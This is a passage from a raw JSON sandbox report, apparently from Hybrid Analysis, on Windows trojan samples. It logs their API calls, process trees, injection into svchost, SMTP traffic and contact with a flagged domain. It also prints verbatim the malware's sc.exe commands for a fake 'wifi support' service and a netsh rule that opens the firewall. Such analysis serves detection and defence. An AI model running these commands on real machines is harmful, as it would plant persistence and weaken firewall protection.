"https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000003ef64b04e34e00000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a800010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b2dee675733ee670000000000000000\" - (UID: 00000000-00002232)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ctbzjelz.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ctbzjelz.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"2761d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"456524\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004812)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004812)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"ctbzjelz.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\FBJTAUWA\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ctbzjelz.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ctbzjelz.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1\" has section name .text with entropy \"6.630102803682182\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1\" has section name .text with entropy \"7.972855291312212\"\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1\" has section name .reloc with entropy \"6.221496050028631\"\n \"ctbzjelz.exe\" has section name .text with entropy \"6.630102803682182\"\n \"ctbzjelz.exe\" has section name .text with entropy \"7.972855291312212\"\n \"ctbzjelz.exe\" has section name .reloc with entropy \"6.221496050028631\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00003208)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00003208)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" (UID: 00000000-00003208)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\fbjtauwa\\\\\" (UID: 00000000-00004560)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\ctbzjelz.exe\" %WINDIR%\\\\system32\\\\fbjtauwa\\\\\" (UID: 00000000-00004704)\n Spawned process \"sc.exe\" with commandline \"create fbjtauwa binPath= \"%WINDIR%\\\\system32\\\\fbjtauwa\\\\ctbzjelz.exe /d\\\\\"C:\\\\8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00003260)\n Spawned process \"sc.exe\" with commandline \"description fbjtauwa \"wifi internet conection\"\" (UID: 00000000-00002984)\n Spawned process \"sc.exe\" with commandline \"start fbjtauwa\" (UID: 00000000-00004664)\n Spawned process \"ctbzjelz.exe\" with commandline \"/d\"C:\\\\8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\"\" (UID: 00000000-00002972)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004812)\n Spawned process \"svchost.exe\" (UID: 00000000-00002232)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 472)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 212)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 212)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 212)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 164)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 164)\n \"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 164)\n \"ctbzjelz.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"ctbzjelz.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"ctbzjelz.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"ctbzjelz.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\" allocated memory in \"C:\\8ae432a105ad4d956dd273e90e99a0dc0a40677214b896f1a38de4e5f4a2eca1.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"ctbzjelz.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00002972)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"ctbzjelz.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c01000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\") to a remote process \"C:\\Windows\\System32\\svchost.exe\"\n which might be an injection preparation attempt ...", "origin": "API Call", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-269", "type": 9, "relevance": 7, "name": "Windows system process connects to a network", "description": "Process \"svchost.exe\" connects to <IPv4>:443", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-10", "type": 7, "relevance": 6, "name": "Sends network traffic on a typical mail related ports", "description": "Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)\n Mail traffic to <IPv4> on port 25 (SMTP)", "origin": "Network Traffic", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "network-88", "type": 7, "relevance": 10, "name": "Application communicates with a malicious domain", "description": "Contacted Domain: \"lazystax.ru\" has been identified as malicious", "origin": "Network Traffic", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-303", "type": 9, "relevance": 10, "name": "Starts service using SC.exe", "description": "Process \"sc.exe\" with commandline \"start fbjtauwa\" (UID: 00000000-00004664)", "origin": "Monitored Target", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-15", "type": 9, "relevance": 8, "name": "Modifies firewall settings", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004812)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f
https://hybrid-analysis.com/sample/71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f
Hybrid Analysis - Um_unhooking
{"size": 11030016, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f", "sha256": "71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f", "av_detect": 88, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 4, "total_processes": 9, "total_signatures": 241, "extracted_files": [{"name": "nhhyjsjl.exe", "file_path": "%TEMP%\\nhhyjsjl.exe", "file_size": 5242368, "sha256": "582821b90ab3c01bdf733f6612886651683ec0c5acf2e3b9422bdee8d83d5d64", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe (PID: 4512)", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}, {"name": "nhhyjsjl.exe.67EE49B9.bin", "file_size": 14540288, "sha256": "e3f962502a668f2c4841e874d3412180103f7426a233ccbfc8d59441d6e81d6e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level": 2, "threat_level_readable": "malicious", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00004512", "name": "71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe", "normalized_path": "C:\\71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe", "sha256": "71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f"}, {"uid": "00000000-00004280", "parentuid": "00000000-00004512", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\zvdnuoqu\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004672", "parentuid": "00000000-00004512", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\nhhyjsjl.exe\" %WINDIR%\\system32\\zvdnuoqu\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00001376", "parentuid": "00000000-00004512", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create zvdnuoqu binPath= \"%WINDIR%\\system32\\zvdnuoqu\\nhhyjsjl.exe /d\\\"C:\\71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004608", "parentuid": "00000000-00004512", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description zvdnuoqu \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004836", "parentuid": "00000000-00004512", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start zvdnuoqu", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00002444", "parentuid": "00000000-00004512", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00002928", "name": "nhhyjsjl.exe", "normalized_path": "%WINDIR%\\system32\\zvdnuoqu\\nhhyjsjl.exe", "command_line": "/d\"C:\\71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\"", "sha256": "e3f962502a668f2c4841e874d3412180103f7426a233ccbfc8d59441d6e81d6e"}, {"uid": "00000000-00002980", "parentuid": "00000000-00002928", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 6, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", 